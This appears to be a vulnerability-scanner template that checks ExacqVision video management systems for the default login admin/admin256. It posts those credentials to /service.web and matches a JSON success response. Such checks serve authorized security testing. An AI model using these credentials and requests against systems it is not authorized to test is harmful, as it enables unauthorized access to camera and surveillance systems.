漏洞描述
fafo "ExacqVision"
id: exacqvision-default-password
info:
name: ExacqVision Default Login
author: ELSFA7110
severity: high
verified: true
description: fafo "ExacqVision"
set:
username: "admin"
password: "admin256"
rules:
r0:
request:
method: POST
path: /service.web
body: action=login&u={{username}}&p={{password}}
expression: |
response.status == 200 && response.body.bcontains(b'"auth":') && response.body.bcontains(b'"success": true') && response.headers["content-type"].contains("application/json")
expression: r0()